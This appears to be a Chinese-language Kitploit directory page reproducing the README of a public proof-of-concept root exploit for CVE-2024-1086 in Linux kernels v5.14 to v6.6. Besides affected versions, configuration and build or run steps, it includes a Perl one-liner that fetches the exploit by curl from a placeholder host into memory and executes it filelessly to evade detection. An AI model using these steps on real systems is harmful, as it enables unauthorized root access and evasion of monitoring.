Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/ccievoice2009/cve-2024-1086
权限提升漏洞分析漏洞利用渗透测试学习与教育二进制利用
GitHubccievoice2009/cve-2024-1086

CVE-2024-1086

针对 CVE-2024-1086 的本地权限提升漏洞利用程序,目标为 Linux 内核 v5.14 至 v6.6,在 KernelCTF 环境中成功率高达 99.4%。

查看仓库
12年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2024-1086

针对 CVE-2024-1086 的通用本地权限提升概念验证漏洞利用,适用于大多数介于 v5.14 至 v6.6 之间的 Linux 内核,包括 Debian、Ubuntu 和 KernelCTF。在 KernelCTF 镜像中成功率为 99.4%。

https://github.com/Notselwyn/CVE-2024-1086/assets/68616630/a3d43951-94ab-4c09-a14b-07b81f89b3de

博客文章 / 详细分析

漏洞的完整分析——包括背景信息和大量有用的图表——可以在 Flipping Pages 博客文章 中找到。

受影响版本

该漏洞利用影响从 v5.14(含)到 v6.6(含)的版本,但已修补的分支 v5.15.149>、v6.1.76>、v6.6.15> 除外。这些版本的补丁已于 2024 年 2 月发布。底层漏洞影响从 v3.15 到 v6.8-rc1 的所有版本(已修补的稳定分支除外)。

注意事项:

  • 在 kconfig 配置 CONFIG_INIT_ON_ALLOC_DEFAULT_ON=y(包括 Ubuntu v6.5)的 v6.4> 内核上,该漏洞利用无法工作。
  • 该漏洞利用需要用户命名空间(kconfig CONFIG_USER_NS=y),这些用户命名空间是非特权模式(shell 命令 sysctl kernel.unprivileged_userns_clone = 1),并且需要启用 nf_tables(kconfig CONFIG_NF_TABLES=y)。默认情况下,Debian、Ubuntu 和 KernelCTF 均启用了这些配置。其他发行版尚未测试,但也可能有效。此外,该漏洞利用仅在 x64/amd64 上进行了测试。
  • 在网络活动较多的系统上,漏洞利用可能非常不稳定。
    • 当使用无线网卡且被高使用率 WiFi 网络包围时,系统会非常不稳定。
    • 在测试设备上,请通过 BIOS 关闭无线网卡。
  • 运行漏洞利用后出现的内核恐慌(系统崩溃)是一个副作用,有意未修复,以防止恶意使用该漏洞利用(即,利用尝试现在更易于察觉,在实际操作中不实用)。尽管如此,它仍然允许在实验室环境中作为概念验证运行,因为 root shell 可以正常工作,并且可以通过磁盘进行持久化。

使用说明

配置

默认值应适用于具有本地 shell 的 Debian、Ubuntu 和 KernelCTF。在未测试的配置/发行版上,请确保 kconfig 值与目标内核匹配。这些可以在 src/config.h 中指定。如果您在物理内存超过 32GiB 的机器上运行该漏洞利用,请确保增加 CONFIG_PHYS_MEM。 如果您通过 SSH(进入测试机器)或反向 shell 运行漏洞利用,可能需要将 CONFIG_REDIRECT_LOG 切换为 1,以避免不必要的网络活动。

构建

如果这对您来说不切实际,这里有一个使用默认配置的编译好的 x64 二进制文件。

root@kitploit:~
git clone https://github.com/Notselwyn/CVE-2024-1086
cd CVE-2024-1086
make

二进制文件:CVE-2024-1086/exploit

运行

运行漏洞利用同样简单:

root@kitploit:~
./exploit

在需要避免检测的渗透测试场景中,也支持无文件执行。不过,目标上需要安装 Perl:

root@kitploit:~
perl -e '
  require qw/syscall.ph/;

  my $fd = syscall(SYS_memfd_create(), $fn, 0);
  system "curl https://example.com/exploit -s >&$fd";
  exec {"/proc/$$/fd/$fd"} "memfd";
'

免责声明

此软件目录/文件夹/仓库(“仓库”)中的程序和脚本(“程序”)仅出于教育/研究目的发布、开发和分发。我(“创建者”)不赞同任何恶意或非法使用此仓库中的程序,因为其意图是分享研究,而非进行非法活动。对于您使用此仓库中的程序所做的任何事情,我均不承担法律责任。

下载工具